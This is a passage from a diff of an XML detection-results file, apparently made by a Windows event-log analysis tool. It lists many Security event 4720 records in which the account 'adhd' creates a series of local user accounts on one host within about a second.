Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Christine</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4801</recordid>
-            <time>2020-06-11 22:05:03.414115100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.4141151Z'/&gt;&lt;EventRecordID&gt;4801&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kathleen&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1126&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kathleen&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kathleen</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4795</recordid>
-            <time>2020-06-11 22:05:03.331585500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.3315855Z'/&gt;&lt;EventRecordID&gt;4795&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kathy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1125&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kathy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kathy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4789</recordid>
-            <time>2020-06-11 22:05:03.245201100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.2452011Z'/&gt;&lt;EventRecordID&gt;4789&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Anna&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1124&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Anna&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Anna</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4783</recordid>
-            <time>2020-06-11 22:05:03.105209900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.1052099Z'/&gt;&lt;EventRecordID&gt;4783&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Rebecca&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1123&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Rebecca&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Rebecca</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4777</recordid>
-            <time>2020-06-11 22:05:03.21654200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.0216542Z'/&gt;&lt;EventRecordID&gt;4777&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Rachel&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1122&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Rachel&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Rachel</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4771</recordid>
-            <time>2020-06-11 22:05:02.931007000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.9310070Z'/&gt;&lt;EventRecordID&gt;4771&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Aaron&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1121&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Aaron&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Aaron</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4765</recordid>
-            <time>2020-06-11 22:05:02.717343400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.7173434Z'/&gt;&lt;EventRecordID&gt;4765&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Alexander&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1120&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Alexander&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Alexander</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4759</recordid>
-            <time>2020-06-11 22:05:02.625358900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.6253589Z'/&gt;&lt;EventRecordID&gt;4759&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Daniel&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1119&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Daniel&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Daniel</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4753</recordid>
-            <time>2020-06-11 22:05:02.542258900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.5422589Z'/&gt;&lt;EventRecordID&gt;4753&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;James&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1118&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;James&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data 